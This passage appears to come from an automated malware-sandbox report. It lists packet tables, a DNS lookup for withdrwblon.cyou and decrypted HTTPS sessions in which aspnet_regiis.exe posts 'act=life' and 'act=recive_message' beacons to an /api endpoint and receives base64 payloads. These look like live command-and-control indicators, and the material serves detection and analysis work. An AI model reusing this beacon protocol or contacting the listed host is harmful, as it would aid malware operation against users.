Oct 24, 2024 21:59:14.197741985 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.200155020 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.200253963 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.200318098 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.200776100 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.200790882 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.642529964 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.642628908 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.642704010 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.642931938 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.642945051 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.665436029 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.665472984 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.665558100 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.665857077 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.665873051 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.696330070 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.696454048 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.696547031 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.697010040 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.697010040 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.697038889 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.697053909 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.329914093 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.330264091 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.332123995 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.332134962 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.332461119 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.334079027 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.334079027 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.334171057 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.814409018 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.814537048 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.814846039 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.814960957 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.814960957 CEST	49727	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:15.814985037 CEST	443	49727	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:15.814999104 CEST	443	49727	188.114.97.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:59:00.839535952 CEST	61346	53	192.168.2.5	1.1.1.1
Oct 24, 2024 21:59:01.208661079 CEST	53	61346	1.1.1.1	192.168.2.5
Oct 24, 2024 21:59:28.494359970 CEST	53	60792	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 21:59:00.839535952 CEST	192.168.2.5	1.1.1.1	0xd69b	Standard query (0)	withdrwblon.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 21:59:01.208661079 CEST	1.1.1.1	192.168.2.5	0xd69b	No error (0)	withdrwblon.cyou		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:59:01.208661079 CEST	1.1.1.1	192.168.2.5	0xd69b	No error (0)	withdrwblon.cyou		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

withdrwblon.cyou

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:01 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: withdrwblon.cyou
2024-10-24 19:59:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-24 19:59:02 UTC	1012	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j7uar2ns86e8s85e8r3rd3uv69; expires=Mon, 17 Feb 2025 13:45:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mE2PM0NRtsZsujFeAZCSrbofak4C0%2FzprS%2FEwO4EWX3jLJZvqbW4%2FH8%2FpOvimnZzF06AD3yb699hjkBIb3OWQUvNLOWfyYYp9QzDw9zHgrq%2BllxKD4OaAEJM4Yc%2FWxx3hcJ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b85ba0053df-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20066&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=144144&cwnd=32&unsent_bytes=0&cid=e36facbbeb3b14f1&ts=553&x=0"
2024-10-24 19:59:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-24 19:59:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49704	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:01 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: withdrwblon.cyou
2024-10-24 19:59:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-24 19:59:02 UTC	1009	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mtn3opbac9d142u97ifpr1i0i4; expires=Mon, 17 Feb 2025 13:45:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAcolz9QlGJzzMd6j%2FdjVOcF9QtvKvduEoeSkW3vrhFOnNbapYs4FW7PfLJaf%2FgSXK2CpmXA3nZklgOlVA3nKrE%2F9sIfAhqiNRqzOM5DCxqEAWPnJKFgf%2FNzCyvY7mSY5cz3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b85dac2e73a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1055&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2637522&cwnd=243&unsent_bytes=0&cid=62a39b8a8192c4ae&ts=675&x=0"
2024-10-24 19:59:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-24 19:59:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:03 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: withdrwblon.cyou
2024-10-24 19:59:03 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-10-24 19:59:03 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=63727s9vikqkbj3gqbaj6g9k3o; expires=Mon, 17 Feb 2025 13:45:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3m1qmfPqCtF3Z7NkEkdbvXLpqMznEkjm2TvKuoOinDiJmG8qksAotoaalA3VIhqMD3PChRIEn%2Fp%2BrlS3k2DgjzuXIIYQJYnh7DdqdDd%2FO0hqWLZFlbGLtpSOtbo03tFDtFo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b8e4c5ee7cb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=980&delivery_rate=2421404&cwnd=32&unsent_bytes=0&cid=ed3d304423b6c452&ts=557&x=0"
2024-10-24 19:59:03 UTC	363	IN	Data Raw: 34 32 65 34 0d 0a 59 77 52 53 6b 63 6d 55 71 4f 2b 63 6f 52 56 6f 42 58 79 51 59 62 41 4a 36 54 35 61 57 63 32 39 6b 44 74 76 38 6d 64 46 33 68 77 59 4a 69 53 7a 38 36 43 45 7a 65 2f 45 4e 31 4a 6a 48 66 77 53 31 53 58 4c 58 7a 35 37 39 39 76 78 56 78 79 58 53 32 65 6f 63 55 45 2b 4e 50 43 6c 35 38 33 44 76 73 52 74 53 6a 38 6e 36 30 50 56 5a 38 73 45 65 44 79 6e 33 2f 46 58 44 5a 4d 4d 4b 71 35 77 41 47 77 2b 39 71 48 78 79 34 76 39 7a 58 67 4e 59 42 6e 78 43 39 35 67 68 46 59 33 65 2b 47 66 39 55 46 4e 79 45 55 49 75 32 67 43 53 54 50 69 6f 72 62 56 77 2b 65 44 63 41 59 6e 52 72 49 41 31 57 75 46 57 44 34 79 70 64 58 34 58 77 79 57 44 54 57 33 65 67 74 73 4d 50 57 67 2b 38 4b 66 38 4d 64 2f 42 6d 59 54 38 55 4f 63 4b 34 78 45 65 47 50 76 6a 4d 42 61 48 Data Ascii: 42e4YwRSkcmUqO+coRVoBXyQYbAJ6T5aWc29kDtv8mdF3hwYJiSz86CEze/EN1JjHfwS1SXLXz5799vxVxyXS2eocUE+NPCl583DvsRtSj8n60PVZ8sEeDyn3/FXDZMMKq5wAGw+9qHxy4v9zXgNYBnxC95ghFY3e+Gf9UFNyEUIu2gCSTPiorbVw+eDcAYnRrIA1WuFWD4ypdX4XwyWDTW3egtsMPWg+8Kf8Md/BmYT8UOcK4xEeGPvjMBaH
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 57 49 4d 2b 51 72 66 5a 6f 74 52 4d 6a 53 73 33 2f 56 54 42 35 38 50 49 37 46 7a 42 32 59 77 73 2b 57 32 7a 5a 57 2b 6d 7a 63 70 59 67 37 31 44 38 51 70 73 52 77 6e 64 62 61 66 39 56 56 4e 79 45 55 76 75 58 30 43 62 54 2f 77 6f 2f 33 59 6a 65 7a 46 65 67 39 31 47 50 63 4e 32 47 69 5a 56 6a 59 39 72 4e 62 35 55 41 69 58 41 57 66 79 50 67 5a 2b 63 4b 76 72 31 38 65 47 38 73 6c 67 43 69 63 42 76 42 71 53 62 49 63 63 59 48 75 72 33 76 5a 59 43 5a 34 4c 49 37 42 34 44 32 73 2f 39 61 48 32 7a 59 66 32 79 33 59 48 62 42 48 79 42 74 39 76 6a 56 41 35 50 75 2b 52 73 6c 34 56 30 46 31 6e 6b 6e 6b 43 64 48 4c 47 71 50 6a 45 69 75 69 44 61 45 52 2b 58 76 55 50 6b 6a 50 4c 55 6a 30 30 76 64 37 67 58 41 4f 43 43 53 4b 36 63 77 4a 6f 4d 50 61 73 2b 38 53 4c 2b 63 42 2f Data Ascii: WIM+QrfZotRMjSs3/VTB58PI7FzB2Yws+W2zZW+mzcpYg71D8QpsRwndbaf9VVNyEUvuX0CbT/wo/3YjezFeg91GPcN2GiZVjY9rNb5UAiXAWfyPgZ+cKvr18eG8slgCicBvBqSbIccYHur3vZYCZ4LI7B4D2s/9aH2zYf2y3YHbBHyBt9vjVA5Pu+Rsl4V0F1nknkCdHLGqPjEiuiDaER+XvUPkjPLUj00vd7gXAOCCSK6cwJoMPas+8SL+cB/
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 55 50 6b 6a 50 4c 55 44 45 37 70 4e 58 32 57 51 71 64 41 43 53 37 66 51 78 68 4f 76 32 73 38 73 61 45 38 38 56 33 44 57 4d 62 34 41 62 62 5a 34 63 63 64 6e 75 6f 78 37 49 42 54 62 38 43 4d 62 39 52 41 6e 63 35 73 37 53 34 30 38 33 35 7a 7a 64 53 4a 78 6e 33 43 39 6c 74 67 31 77 71 50 71 48 55 38 31 4d 4c 6b 51 67 72 75 6e 34 41 5a 6a 62 2f 71 2f 48 4e 6e 2b 7a 47 63 52 68 74 58 72 78 44 31 58 50 4c 42 48 67 4e 76 38 6a 6a 54 30 2b 6c 42 69 6d 79 65 52 63 6d 4c 37 32 79 74 73 32 42 76 70 73 33 41 57 63 53 39 51 76 55 62 34 4e 54 4e 7a 4b 39 33 76 35 58 48 35 63 46 4c 72 4a 78 44 57 38 39 39 4b 62 39 77 49 44 36 78 48 5a 4b 4b 56 37 31 47 35 49 7a 79 32 6f 6f 4e 71 50 78 2b 56 55 45 30 42 70 70 70 54 34 47 61 6e 43 72 36 2f 4c 47 68 66 54 4d 66 67 42 74 45 Data Ascii: UPkjPLUDE7pNX2WQqdACS7fQxhOv2s8saE88V3DWMb4AbbZ4ccdnuox7IBTb8CMb9RAnc5s7S40835zzdSJxn3C9ltg1wqPqHU81MLkQgrun4AZjb/q/HNn+zGcRhtXrxD1XPLBHgNv8jjT0+lBimyeRcmL72yts2Bvps3AWcS9QvUb4NTNzK93v5XH5cFLrJxDW899Kb9wID6xHZKKV71G5Izy2ooNqPx+VUE0BpppT4GanCr6/LGhfTMfgBtE
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 6b 79 78 4a 34 50 4c 65 66 71 68 6b 69 74 7a 42 6c 6e 55 52 42 65 58 37 71 36 2f 48 47 7a 61 61 44 65 77 6c 72 46 76 30 46 32 32 65 42 56 54 4d 33 70 4e 76 2b 55 41 69 57 42 43 4b 35 66 77 56 71 4f 76 57 6f 39 63 57 43 38 63 73 33 52 43 63 5a 36 6b 4f 4b 4b 36 35 4c 4d 7a 57 70 6e 2b 30 58 46 4e 41 43 4b 2f 77 6d 51 57 6f 35 39 61 33 7a 78 6f 7a 34 79 33 49 43 59 78 2f 30 42 64 46 6b 6a 31 6b 35 4e 4b 76 54 2f 46 4d 4d 6b 51 6b 73 73 33 55 45 4a 6e 36 7a 72 4f 36 4b 31 62 37 79 64 42 78 77 44 76 35 44 7a 53 57 53 48 44 38 33 37 34 65 79 57 42 2b 61 44 79 6d 35 63 51 52 6c 50 2f 53 6d 38 4d 61 48 39 38 74 78 42 57 34 4d 38 51 2f 63 62 49 56 51 4e 6a 61 6c 33 50 38 5a 51 39 41 43 50 2f 77 6d 51 55 6f 33 2f 6f 58 39 78 6f 71 2b 33 44 6b 54 4a 78 6e 2b 51 34 Data Ascii: kyxJ4PLefqhkitzBlnURBeX7q6/HGzaaDewlrFv0F22eBVTM3pNv+UAiWBCK5fwVqOvWo9cWC8cs3RCcZ6kOKK65LMzWpn+0XFNACK/wmQWo59a3zxoz4y3ICYx/0BdFkj1k5NKvT/FMMkQkss3UEJn6zrO6K1b7ydBxwDv5DzSWSHD8374eyWB+aDym5cQRlP/Sm8MaH98txBW4M8Q/cbIVQNjal3P8ZQ9ACP/wmQUo3/oX9xoq+3DkTJxn+Q4
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 44 6a 79 2f 7a 2f 45 62 50 49 59 47 4d 62 64 7a 44 53 59 76 76 62 4b 32 7a 59 47 2b 6d 7a 63 4d 61 42 66 78 44 4e 4e 69 68 31 45 39 4d 71 72 65 39 46 30 48 6d 67 55 68 75 6e 38 45 62 44 50 79 6f 66 2f 4e 68 66 6e 41 5a 55 6f 70 58 76 55 62 6b 6a 50 4c 64 54 38 70 6f 63 2b 79 52 6b 4f 4a 52 53 43 77 50 6c 6b 6d 4e 50 6d 6b 38 73 32 42 2b 4d 5a 78 42 32 59 52 38 77 50 64 62 34 42 56 50 6a 71 69 32 76 39 64 48 35 6f 4f 4b 4c 42 33 44 57 74 77 76 65 76 78 30 73 32 6d 67 30 59 48 61 52 44 31 46 5a 4a 30 78 55 56 34 50 4b 4f 66 71 68 6b 4d 6e 41 6f 6b 73 33 30 43 5a 7a 72 68 75 66 72 44 68 66 76 50 66 41 52 68 44 50 51 4d 32 32 69 49 56 54 38 7a 6f 39 58 78 58 6b 33 65 52 53 43 6b 50 6c 6b 6d 45 2b 53 37 2b 34 71 53 73 4e 6f 33 44 57 74 65 71 6b 50 61 5a 6f 4e Data Ascii: Djy/z/EbPIYGMbdzDSYvvbK2zYG+mzcMaBfxDNNih1E9Mqre9F0HmgUhun8EbDPyof/NhfnAZUopXvUbkjPLdT8poc+yRkOJRSCwPlkmNPmk8s2B+MZxB2YR8wPdb4BVPjqi2v9dH5oOKLB3DWtwvevx0s2mg0YHaRD1FZJ0xUV4PKOfqhkMnAoks30CZzrhufrDhfvPfARhDPQM22iIVT8zo9XxXk3eRSCkPlkmE+S7+4qSsNo3DWteqkPaZoN
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 74 62 32 55 51 36 51 41 53 4f 37 65 77 4a 71 4f 2f 53 6f 2b 63 36 45 38 4d 70 34 53 69 6c 65 39 52 75 53 4d 38 74 39 49 7a 69 6a 30 72 4a 47 51 34 6c 46 49 4c 41 2b 57 53 59 38 2f 61 37 32 77 49 76 36 78 6e 45 41 59 68 37 35 41 4e 31 76 6a 56 67 33 4f 36 54 57 38 31 38 49 6d 67 34 68 73 58 30 48 59 48 43 39 36 2f 48 53 7a 61 61 44 56 78 46 71 45 76 56 44 7a 53 57 53 48 44 38 33 37 34 65 79 55 67 47 55 41 69 65 78 66 51 6c 6a 4e 50 6d 75 39 73 4b 66 39 73 4e 77 47 48 55 65 2b 77 62 65 61 49 74 59 50 6a 4b 70 33 50 59 5a 51 39 41 43 50 2f 77 6d 51 55 73 38 39 49 4c 78 30 63 33 68 6a 57 35 4b 59 42 4b 79 57 35 4a 71 67 46 59 33 4e 71 7a 5a 38 56 49 49 6d 67 51 67 74 48 4d 54 5a 54 2f 38 72 2f 62 46 69 2f 6a 43 65 41 78 67 46 2f 4d 4c 31 53 76 46 48 44 38 6a Data Ascii: tb2UQ6QASO7ewJqO/So+c6E8Mp4Sile9RuSM8t9Izij0rJGQ4lFILA+WSY8/a72wIv6xnEAYh75AN1vjVg3O6TW818Img4hsX0HYHC96/HSzaaDVxFqEvVDzSWSHD8374eyUgGUAiexfQljNPmu9sKf9sNwGHUe+wbeaItYPjKp3PYZQ9ACP/wmQUs89ILx0c3hjW5KYBKyW5JqgFY3NqzZ8VIImgQgtHMTZT/8r/bFi/jCeAxgF/ML1SvFHD8j
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 4d 41 6c 68 49 32 38 47 73 43 61 44 37 30 76 62 61 45 7a 66 47 44 4c 7a 4d 6e 56 72 49 38 6e 43 75 54 48 47 42 37 6d 74 7a 38 56 77 71 47 46 47 71 62 5a 41 78 67 4a 2b 4c 72 75 49 71 4c 76 70 73 6e 52 43 63 61 34 30 4f 4b 4f 39 6b 48 62 57 6a 34 6a 36 42 47 51 34 6c 46 4d 66 77 6d 55 79 68 77 34 65 75 75 69 73 72 39 30 57 55 4d 5a 41 6a 78 52 4f 78 56 70 56 73 2b 50 71 6a 50 73 48 63 47 68 41 4a 6e 38 6a 34 4f 4a 6d 6a 4b 36 37 36 4b 73 72 43 44 62 30 6f 2f 58 73 63 41 33 47 57 4d 53 69 6c 32 67 64 6a 30 58 41 71 41 52 77 6d 33 61 67 59 6d 66 72 4f 74 74 70 4c 64 73 49 4e 7a 47 79 64 47 6f 6c 47 4a 50 74 67 4c 61 47 6d 77 6b 65 73 5a 47 39 42 64 64 66 49 2b 45 79 5a 6f 73 2b 7a 31 32 4a 2f 34 77 47 45 4a 49 43 44 4d 41 4d 52 6d 68 46 63 35 42 5a 48 78 2f Data Ascii: MAlhI28GsCaD70vbaEzfGDLzMnVrI8nCuTHGB7mtz8VwqGFGqbZAxgJ+LruIqLvpsnRCca40OKO9kHbWj4j6BGQ4lFMfwmUyhw4euuisr90WUMZAjxROxVpVs+PqjPsHcGhAJn8j4OJmjK676KsrCDb0o/XscA3GWMSil2gdj0XAqARwm3agYmfrOttpLdsINzGydGolGJPtgLaGmwkesZG9BddfI+EyZos+z12J/4wGEJICDMAMRmhFc5BZHx/
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 4c 49 4b 70 76 54 45 45 2b 39 4b 72 67 32 70 72 78 6a 46 6b 38 52 6c 36 38 51 39 51 72 30 77 35 32 65 36 76 4f 73 67 46 64 77 6c 35 79 37 79 6c 52 4e 43 2b 39 73 72 62 63 7a 61 61 52 4f 55 70 31 58 71 70 44 6c 57 69 5a 54 6a 34 34 75 64 79 31 5a 7a 4f 33 43 79 43 39 61 42 46 72 50 4e 4b 6f 35 38 43 7a 77 4e 5a 30 42 47 6b 5a 35 42 4b 53 4a 63 74 54 65 47 4f 57 6e 37 6f 5a 4d 74 35 46 50 2f 77 6d 51 56 4d 7a 2f 61 58 78 33 4a 79 7a 35 48 6b 4e 5a 67 6a 69 44 74 35 4b 69 45 30 79 65 2b 47 66 39 42 6c 56 77 6b 74 6e 75 47 39 42 50 6d 43 68 38 4b 4f 5a 32 71 36 52 61 45 52 2b 58 75 52 44 69 6a 6e 46 48 43 70 37 39 35 2b 31 57 68 2b 43 41 79 53 71 66 55 5a 59 44 74 61 38 39 64 71 4c 2f 66 31 4a 49 57 73 59 39 52 6e 56 62 61 31 38 65 48 58 76 30 4c 49 42 4e 4e Data Ascii: LIKpvTEE+9Krg2prxjFk8Rl68Q9Qr0w52e6vOsgFdwl5y7ylRNC+9srbczaaROUp1XqpDlWiZTj44udy1ZzO3CyC9aBFrPNKo58CzwNZ0BGkZ5BKSJctTeGOWn7oZMt5FP/wmQVMz/aXx3Jyz5HkNZgjiDt5KiE0ye+Gf9BlVwktnuG9BPmCh8KOZ2q6RaER+XuRDijnFHCp795+1Wh+CAySqfUZYDta89dqL/f1JIWsY9RnVba18eHXv0LIBNN
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 50 68 6b 6d 61 4c 4f 47 35 4d 32 64 2f 59 46 53 4d 43 55 76 35 41 44 53 5a 59 77 63 4a 33 57 32 6e 2b 51 5a 56 63 4e 4c 5a 36 34 2b 57 53 5a 33 2f 61 62 33 79 59 50 39 30 57 55 4d 5a 41 6a 78 52 4f 78 56 70 46 63 35 4b 36 4c 4f 2f 31 30 62 72 6a 73 41 75 6e 73 47 57 41 37 45 75 76 48 61 7a 39 6a 41 59 51 6b 6e 55 4c 49 62 6b 6a 50 4c 65 7a 34 2b 71 4a 2b 38 47 51 6e 51 58 57 65 54 64 51 42 32 50 65 4b 6d 38 74 7a 50 32 63 56 79 44 53 64 51 73 67 2b 53 4d 38 74 54 4b 54 79 70 32 76 55 56 43 6f 6f 43 5a 2f 49 2b 44 79 5a 6f 73 36 54 6e 7a 59 76 37 78 44 73 4d 61 52 43 79 48 4a 78 79 79 30 70 34 59 2f 79 52 73 6b 74 4e 79 45 56 67 73 6e 4d 41 5a 54 37 77 75 65 54 4d 6a 75 6a 41 4d 44 52 5a 50 75 49 41 78 6d 79 36 55 54 77 74 75 74 7a 69 58 6a 4f 75 4a 54 65 Data Ascii: PhkmaLOG5M2d/YFSMCUv5ADSZYwcJ3W2n+QZVcNLZ64+WSZ3/ab3yYP90WUMZAjxROxVpFc5K6LO/10brjsAunsGWA7EuvHaz9jAYQknULIbkjPLez4+qJ+8GQnQXWeTdQB2PeKm8tzP2cVyDSdQsg+SM8tTKTyp2vUVCooCZ/I+DyZos6TnzYv7xDsMaRCyHJxyy0p4Y/yRsktNyEVgsnMAZT7wueTMjujAMDRZPuIAxmy6UTwtutziXjOuJTe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:03 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: withdrwblon.cyou
2024-10-24 19:59:03 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-10-24 19:59:03 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i381ncoo3hn312d7f24eq858lq; expires=Mon, 17 Feb 2025 13:45:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YZ0YD7sfVZqn5o0gqKgbZ5MREM%2BVsaf%2Fiz8m9wDXLU5sf3%2Fvt304736c40HG4XVZxsF5X0RncHmwNlt0DhL5Fa6biML826XIfk0n%2BU0tX4Yyn8k%2FJf6Ahp9K51BTWGmE%2Fmo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b8e5e006b89-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=980&delivery_rate=2403319&cwnd=251&unsent_bytes=0&cid=7d40a0ccbe640d40&ts=514&x=0"
